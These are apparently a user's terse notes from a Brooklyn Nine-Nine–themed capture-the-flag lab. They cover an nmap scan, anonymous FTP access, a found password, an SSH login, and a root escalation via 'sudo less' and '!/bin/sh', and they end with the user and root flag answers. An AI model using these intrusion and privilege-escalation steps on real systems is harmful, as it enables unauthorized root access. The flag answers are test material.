IP= 10.10.0.153

---------------------------------------------------


username: jake , amy , holy

username:jack
password:987654321




ftp 10.10.0.153
anonymous
anonymous

note_to_jake.txt:


"From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine"


--------------------------
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).




-----------------------------------------------------

ENTERİNG THE SSH PORT

ssh jake@10.10.0.153

sudo -l

sudo less /etc/profile
!/bin/sh



user flag:
directory:/holt


ee11cbb19052e40b07aac0ca060c23ee


root flag:
directory: /root

63a9f0ea7bb98050796b649e85481845
